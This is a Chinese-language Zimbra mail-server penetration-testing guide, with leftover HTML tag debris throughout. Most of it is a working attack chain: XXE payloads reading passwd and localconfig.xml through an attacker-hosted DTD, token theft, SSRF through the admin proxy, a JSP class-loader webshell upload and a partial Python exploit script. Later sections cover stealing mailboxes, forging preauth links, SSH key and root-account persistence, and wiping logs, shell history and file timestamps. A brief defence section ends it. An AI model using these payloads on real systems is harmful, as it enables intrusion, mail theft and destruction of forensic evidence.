Zimbra邮件服务器渗透测试技术指南<\/h1>

1. Zimbra邮件服务器搭建<\/h2>

基本环境配置<\/h3>
操作系统：CentOS 7<\/li>
域名：vvvv1.zimbra.com<\/li>
管理员账户：admin@vvvv1.zimbra.com\/123456<\/li> <\/ul>
安装步骤<\/h3>
参考安装教程：<\/p>
https:\/\/blog.csdn.net\/u013618714\/article\/details\/115478116<\/li>
https:\/\/www.jianshu.com\/p\/722bc70ff426<\/li>
https:\/\/xz.aliyun.com\/t\/7991<\/li> <\/ul> <\/li>
防火墙配置：<\/p> <\/li> <\/ol>
# 开启443端口<\/span>
<\/span><\/span>iptables -I INPUT -p tcp --dport 443<\/span> -j ACCEPT
<\/span><\/span>
<\/span><\/span># 或关闭防火墙<\/span>
<\/span><\/span>systemctl stop firewalld
<\/span><\/span><\/code><\/pre>
创建测试用户：<\/li>
<\/ol>
zmprov createAccount mary@zimbra.com admin123 displayName 'Mary'<\/span>
<\/span><\/span>zmprov createAccount tom@zimbra.com admin123 displayName 'Tom'<\/span>
<\/span><\/span><\/code><\/pre>2. XXE+SSRF组合漏洞利用<\/h2>
漏洞验证<\/h3>
发送POST请求到\/Autodiscover\/Autodiscover.xml<\/code>：<\/p>
<!ENTITY xxe SYSTEM "file:\/\/\/etc\/passwd" ><\/span>]>
<\/span><\/span><Autodiscover<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/exchange\/autodiscover\/outlook\/responseschema\/2006a"<\/span>><\/span>
<\/span><\/span>  <Request><\/span>
<\/span><\/span>    <EMailAddress><\/span>aaaaa<\/EMailAddress><\/span>
<\/span><\/span>    <AcceptableResponseSchema><\/span>&xxe;<\/AcceptableResponseSchema><\/span>
<\/span><\/span>  <\/Request><\/span>
<\/span><\/span><\/Autodiscover><\/span>
<\/span><\/span><\/code><\/pre>读取Zimbra配置文件<\/h3>

创建外部DTD文件(poc.dtd)：<\/li>
<\/ol>
<!ENTITY % file SYSTEM "file:..\/conf\/localconfig.xml"><\/span>
<\/span><\/span><!ENTITY % start "<![CDATA["><\/span>
<\/span><\/span><!ENTITY % end "]]><\/span>">
<\/span><\/span><!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'><\/span>">
<\/span><\/span><\/code><\/pre>
在攻击机上启动HTTP服务：<\/li>
<\/ol>
python3 -m http.server 7777<\/span>
<\/span><\/span><\/code><\/pre>
发送包含远程DTD的请求：<\/li>
<\/ol>
%dtd; %all; ]>
<\/span><\/span><Autodiscover<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/exchange\/autodiscover\/outlook\/responseschema\/2006a"<\/span>><\/span>
<\/span><\/span>  <Request><\/span>
<\/span><\/span>    <EMailAddress><\/span>aaaaa<\/EMailAddress><\/span>
<\/span><\/span>    <AcceptableResponseSchema><\/span>&fileContents;<\/AcceptableResponseSchema><\/span>
<\/span><\/span>  <\/Request><\/span>
<\/span><\/span><\/Autodiscover><\/span>
<\/span><\/span><\/code><\/pre>获取低权限Token<\/h3>
发送SOAP请求到\/service\/soap<\/code>：<\/p>
<soap:Envelope<\/span> xmlns:soap=<\/span>"http:\/\/www.w3.org\/2003\/05\/soap-envelope"<\/span>><\/span>
<\/span><\/span>  <soap:Header><\/span>
<\/span><\/span>    <context<\/span> xmlns=<\/span>"urn:zimbra"<\/span>><\/span>
<\/span><\/span>      <userAgent<\/span> name=<\/span>"ZimbraWebClient - SAF3 (Win)"<\/span> version=<\/span>"5.0.15_GA_2851.RHEL5_64"<\/span>\/><\/span>
<\/span><\/span>    <\/context><\/span>
<\/span><\/span>  <\/soap:Header><\/span>
<\/span><\/span>  <soap:Body><\/span>
<\/span><\/span>    <AuthRequest<\/span> xmlns=<\/span>"urn:zimbraAccount"<\/span>><\/span>
<\/span><\/span>      <account<\/span> by=<\/span>"adminName"<\/span>><\/span>zimbra<\/account><\/span>
<\/span><\/span>      <password><\/span>3JS3MkuYGG<\/password><\/span>
<\/span><\/span>    <\/AuthRequest><\/span>
<\/span><\/span>  <\/soap:Body><\/span>
<\/span><\/span><\/soap:Envelope><\/span>
<\/span><\/span><\/code><\/pre>探测SSRF漏洞<\/h3>
使用获取的Token测试SSRF：<\/p>
POST<\/span> \/service\/proxy?target=https:\/\/abcd.0lzme4.dnslog.cn HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.8.130:7071<\/span>
<\/span><\/span>Cookie:<\/span> ZM_ADMIN_AUTH_TOKEN=0_445fad824269f204515a7c310c0fc7fbfcfc425c_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637383737333133323439343b747970653d363a7a696d6272613b7469643d31303a313338303230313330343b<\/span>
<\/span><\/span><\/code><\/pre>获取高权限Token<\/h3>
通过SSRF获取管理员Token：<\/p>
<soap:Envelope<\/span> xmlns:soap=<\/span>"http:\/\/www.w3.org\/2003\/05\/soap-envelope"<\/span>><\/span>
<\/span><\/span>  <soap:Header><\/span>
<\/span><\/span>    <context<\/span> xmlns=<\/span>"urn:zimbra"<\/span>><\/span>
<\/span><\/span>      <userAgent<\/span> name=<\/span>"ZimbraWebClient - SAF3 (Win)"<\/span> version=<\/span>"5.0.15_GA_2851.RHEL5_64"<\/span>\/><\/span>
<\/span><\/span>    <\/context><\/span>
<\/span><\/span>  <\/soap:Header><\/span>
<\/span><\/span>  <soap:Body><\/span>
<\/span><\/span>    <AuthRequest<\/span> xmlns=<\/span>"urn:zimbraAdmin"<\/span>><\/span>
<\/span><\/span>      <account<\/span> by=<\/span>"adminName"<\/span>><\/span>zimbra<\/account><\/span>
<\/span><\/span>      <password><\/span>3JS3MkuYGG<\/password><\/span>
<\/span><\/span>    <\/AuthRequest><\/span>
<\/span><\/span>  <\/soap:Body><\/span>
<\/span><\/span><\/soap:Envelope><\/span>
<\/span><\/span><\/code><\/pre>3. 上传Webshell<\/h2>
上传JSP木马<\/h3>
使用高权限Token上传Webshell：<\/p>
POST<\/span> \/service\/extension\/clientUploader\/upload HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.52.142:7071<\/span>
<\/span><\/span>Cookie:<\/span> ZM_ADMIN_AUTH_TOKEN=0_ac132517416ecf59c8e7f0e221f8efcf055e535b_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313638393639313639383131313b61646d696e3d313a313b747970653d363a7a696d6272613b7469643d393a3232333338353538393b;<\/span>
<\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=----WebKitFormBoundaryyfguo5iLr5MUuhaZ<\/span>
<\/span><\/span>
<\/span><\/span>------WebKitFormBoundaryyfguo5iLr5MUuhaZ
<\/span><\/span>Content-Disposition: form-data; name="filename1"
<\/span><\/span>
<\/span><\/span>qweqwe
<\/span><\/span>------WebKitFormBoundaryyfguo5iLr5MUuhaZ
<\/span><\/span>Content-Disposition: form-data; name="clientFile";filename="shell.jsp"
<\/span><\/span>
<\/span><\/span><%!
<\/span><\/span>class U extends ClassLoader {
<\/span><\/span>    U(ClassLoader c) {
<\/span><\/span>        super(c);
<\/span><\/span>    }
<\/span><\/span>    public Class g(byte[] b) {
<\/span><\/span>        return super.defineClass(b, 0, b.length);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>public byte[] base64Decode(String str) throws Exception {
<\/span><\/span>    try {
<\/span><\/span>        Class clazz = Class.forName("sun.misc.BASE64Decoder");
<\/span><\/span>        return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
<\/span><\/span>    } catch (Exception e) {
<\/span><\/span>        Class clazz = Class.forName("java.util.Base64");
<\/span><\/span>        Object decoder = clazz.getMethod("getDecoder").invoke(null);
<\/span><\/span>        return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>%>
<\/span><\/span><%
<\/span><\/span>String cls = request.getParameter("passwd");
<\/span><\/span>if (cls != null) {
<\/span><\/span>    new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
<\/span><\/span>}
<\/span><\/span>%>
<\/span><\/span>------WebKitFormBoundaryyfguo5iLr5MUuhaZ
<\/span><\/span>Content-Disposition: form-data; name="requestId"
<\/span><\/span>
<\/span><\/span>111111
<\/span><\/span>------WebKitFormBoundaryyfguo5iLr5MUuhaZ--
<\/span><\/span><\/code><\/pre>4. 自动化利用脚本<\/h2>
参考Python自动化利用脚本：<\/p>
import<\/span> requests
<\/span><\/span>import<\/span> re
<\/span><\/span>import<\/span> argparse
<\/span><\/span>from<\/span> requests.packages.urllib3.exceptions import<\/span> InsecureRequestWarning
<\/span><\/span>requests.<\/span>packages.<\/span>urllib3.<\/span>disable_warnings(InsecureRequestWarning)
<\/span><\/span>
<\/span><\/span>class<\/span> zimbra_rce<\/span>(object):
<\/span><\/span>    def<\/span> __init__(self, base_url, dtd_url, file_name, payload_file):
<\/span><\/span>        self.<\/span>base_url =<\/span> base_url
<\/span><\/span>        self.<\/span>dtd_url =<\/span> dtd_url
<\/span><\/span>        self.<\/span>low_auth =<\/span> {}
<\/span><\/span>        self.<\/span>file_name =<\/span> file_name
<\/span><\/span>        self.<\/span>payload =<\/span> open(payload_file, "r"<\/span>).<\/span>read()
<\/span><\/span>        self.<\/span>pattern_auth_token=<\/span>re.<\/span>compile(r<\/span>"<authToken>(.*?)<\/authToken>"<\/span>)
<\/span><\/span>
<\/span><\/span>    def<\/span> upload_dtd_payload<\/span>(self):
<\/span><\/span>        xxe_payload =<\/span> r<\/span>"""
<\/span><\/span><\/span>            <\/span>%d<\/span>td;
<\/span><\/span><\/span>            <\/span>%a<\/span>ll;
<\/span><\/span><\/span>            ]>
<\/span><\/span><\/span>        <Autodiscover xmlns="http:\/\/schemas.microsoft.com\/exchange\/autodiscover\/outlook\/responseschema\/2006a">
<\/span><\/span><\/span>            <Request>
<\/span><\/span><\/span>                <EMailAddress>aaaaa<\/EMailAddress>
<\/span><\/span><\/span>                <AcceptableResponseSchema>&fileContents;<\/AcceptableResponseSchema>
<\/span><\/span><\/span>            <\/Request>
<\/span><\/span><\/span>        <\/Autodiscover>"""<\/span>.<\/span>format(self.<\/span>dtd_url)
<\/span><\/span>        headers =<\/span> {
<\/span><\/span>            'User-Agent'<\/span>: 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36 Edg\/110.0.1587.63'<\/span>,
<\/span><\/span>            "Content-Type"<\/span>:"application\/xml"<\/span>
<\/span><\/span>        }
<\/span><\/span>        dtd_request =<\/span> requests.<\/span>post(self.<\/span>base_url+<\/span>"\/Autodiscover\/Autodiscover.xml"<\/span>,data=<\/span>xxe_payload,headers=<\/span>headers,verify=<\/span>False<\/span>,timeout=<\/span>15<\/span>)
<\/span><\/span>        if<\/span> 'response schema not available'<\/span> not<\/span> in<\/span> dtd_request.<\/span>text:
<\/span><\/span>            return<\/span> False<\/span>
<\/span><\/span>        else<\/span>:
<\/span><\/span>            pattern_name =<\/span> re.<\/span>compile(r<\/span>"&lt;key name=(<\/span>\"<\/span>|&quot;)zimbra_user(<\/span>\"<\/span>|&quot;)&gt;\n.*?&lt;value&gt;(.*?)&lt;\\/value&gt;"<\/span>)
<\/span><\/span>            pattern_password =<\/span> re.<\/span>compile(r<\/span>"&lt;key name=(<\/span>\"<\/span>|&quot;)zimbra_ldap_password(<\/span>\"<\/span>|&quot;)&gt;\n.*?&lt;value&gt;(.*?)&lt;\\/value&gt;"<\/span>)
<\/span><\/span>            if<\/span> pattern_name.<\/span>findall(dtd_request.<\/span>text) and<\/span> pattern_password.<\/span>findall(dtd_request.<\/span>text):
<\/span><\/span>                username =<\/span> pattern_name.<\/span>findall(dtd_request.<\/span>text)[0<\/span>][2<\/span>]
<\/span><\/span>                password =<\/span> pattern_password.<\/span>findall(dtd_request.<\/span>text)[0<\/span>][2<\/span>]
<\/span><\/span>                self.<\/span>low_auth =<\/span> {"username"<\/span> : username, "password"<\/span> : password}
<\/span><\/span>                return<\/span> True<\/span>
<\/span><\/span>            return<\/span> False<\/span>
<\/span><\/span>
<\/span><\/span>    # 其他方法省略...<\/span>
<\/span><\/span><\/code><\/pre>5. 后渗透技术<\/h2>
导出用户邮件<\/h3>


通过Token导出<\/strong>：<\/p>

获取用户Token后，访问\/home\/{mailbox}\/?fmt=tgz<\/code>导出邮件<\/li>
<\/ul>
<\/li>

预认证攻击<\/strong>：<\/p>

生成preAuthKey：
zmprov generateDomainPreAuthKey vvvv1.zimbra.com
<\/span><\/span><\/code><\/pre><\/li>
读取已有PreAuthKey：
\/opt\/zimbra\/bin\/zmprov gd vvvv1.zimbra.com zimbraPreAuthKey
<\/span><\/span><\/code><\/pre><\/li>
生成预认证URL：
def<\/span> generate_preauth<\/span>(target, mailbox, preauth_key):
<\/span><\/span>    timestamp =<\/span> int(time()*<\/span>1000<\/span>)
<\/span><\/span>    data =<\/span> "<\/span>{mailbox}<\/span>|name|0|<\/span>{timestamp}<\/span>"<\/span>.<\/span>format(mailbox=<\/span>mailbox, timestamp=<\/span>timestamp)
<\/span><\/span>    pak =<\/span> hmac.<\/span>new(preauth_key.<\/span>encode(), data.<\/span>encode(), hashlib.<\/span>sha1).<\/span>hexdigest()
<\/span><\/span>    return<\/span> "<\/span>%s<\/span>?account=<\/span>%s<\/span>&expires=0&timestamp=<\/span>%s<\/span>&preauth=<\/span>%s<\/span>"<\/span>%<\/span>(target+<\/span>"\/service\/preauth"<\/span>, mailbox, timestamp, pak)
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
SSH免密登录<\/h3>


上传公钥到目标服务器：<\/p>
echo 'ssh-rsa AAAAB3NzaC1yc2E...'<\/span> >> ~\/.ssh\/authorized_keys
<\/span><\/span>chmod -R 600<\/span> ~\/.ssh\/
<\/span><\/span><\/code><\/pre><\/li>

修改SSH配置（可选）：<\/p>
sed -i 's\/StrictModes yes\/StrictModes no\/g'<\/span> \/etc\/ssh\/sshd_config
<\/span><\/span>service sshd restart
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
修改用户密码文件<\/h3>

复制root用户信息创建新用户：
# 在\/etc\/passwd中添加<\/span>
<\/span><\/span>testuser:x:0:0:root:\/root:\/bin\/bash
<\/span><\/span>
<\/span><\/span># 在\/etc\/shadow中添加<\/span>
<\/span><\/span>testuser:$6$...:19136:0:99999:7:::
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
6. 痕迹清理<\/h2>
网站日志清理<\/h3>


查找攻击痕迹：<\/p>
find \/opt\/zimbra\/log -type f | xargs grep -l "\/Autodiscover\/Autodiscover.xml"<\/span>
<\/span><\/span>grep -r "\/service\/proxy?target=https:\/\/127.0.0.1"<\/span> \/opt\/zimbra\/log\/
<\/span><\/span><\/code><\/pre><\/li>

清理日志：<\/p>
sed -i '\/192.168.52.1\/s\/.*\/\/g'<\/span> access_log.2023-07-18
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
系统日志清理<\/h3>


wtmp\/btmp日志修改：<\/p>
utmpdump \/var\/log\/wtmp |sed "s\/192.168.52.1\/8.8.8.8\/g"<\/span> |utmpdump -r >\/tmp\/wtmp &&<\/span> mv \/tmp\/wtmp \/var\/log\/wtmp
<\/span><\/span><\/code><\/pre><\/li>

lastlog清理：<\/p>
sed -i '\/192.168.52.130\/d'<\/span> \/var\/log\/lastlog
<\/span><\/span><\/code><\/pre><\/li>

auth.log\/secure清理：<\/p>
grep -l '192.168.52.1'<\/span> \/var\/log\/auth.log* | xargs sed -i '\/192.168.52.1\/s\/.*\/\/g'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
命令历史清理<\/h3>


清除.bash_history：<\/p>
> ~\/.bash_history
<\/span><\/span>history -c
<\/span><\/span><\/code><\/pre><\/li>

禁用历史记录：<\/p>
unset HISTFILE
<\/span><\/span>export HISTFILE=<\/span>\/dev\/null
<\/span><\/span>set +o history
<\/span><\/span><\/code><\/pre><\/li>

修改环境变量：<\/p>
export HISTFILESIZE=<\/span>0<\/span>
<\/span><\/span>export HISTSIZE=<\/span>0<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
修改文件时间戳<\/h3>
touch -a -d "2021-1-1 12:13:14"<\/span> \/var\/log\/wtmp
<\/span><\/span>touch -m -d "2021-1-1 12:13:14"<\/span> \/var\/log\/wtmp
<\/span><\/span><\/code><\/pre>7. 防御措施<\/h2>
防止环境变量修改<\/h3>
在\/etc\/skel\/.bashrc<\/code>和用户.bashrc<\/code>中添加：<\/p>
readonly HISTFILE
<\/span><\/span>readonly HISTFILESIZE
<\/span><\/span>readonly HISTSIZE
<\/span><\/span>readonly HISTCMD
<\/span><\/span>readonly HISTCONTROL
<\/span><\/span>readonly HISTIGNORE
<\/span><\/span><\/code><\/pre>检测notty登录<\/h3>
# 查看TCP连接<\/span>
<\/span><\/span>netstat -vatn
<\/span><\/span>
<\/span><\/span># 检查notty进程<\/span>
<\/span><\/span>ps -aux|grep notty
<\/span><\/span>
<\/span><\/span># 比较ssh进程和登录用户数量<\/span>
<\/span><\/span>w | wc -l
<\/span><\/span>ps -aux | grep sshd | grep -v grep | wc -l
<\/span><\/span><\/code><\/pre>WAF规则<\/h3>
添加规则过滤包含以下特征的请求：<\/p>

127.0.0.1<\/code><\/li>
localhost<\/code><\/li>
Autodiscover.xml<\/code><\/li>
异常的XML实体声明<\/li>
<\/ul>
本指南详细介绍了Zimbra邮件服务器的渗透测试技术，包括漏洞利用、权限提升、后渗透操作和痕迹清理等完整流程。安全研究人员应仅在授权测试中使用这些技术，企业用户应参考防御措施加固系统安全。<\/p>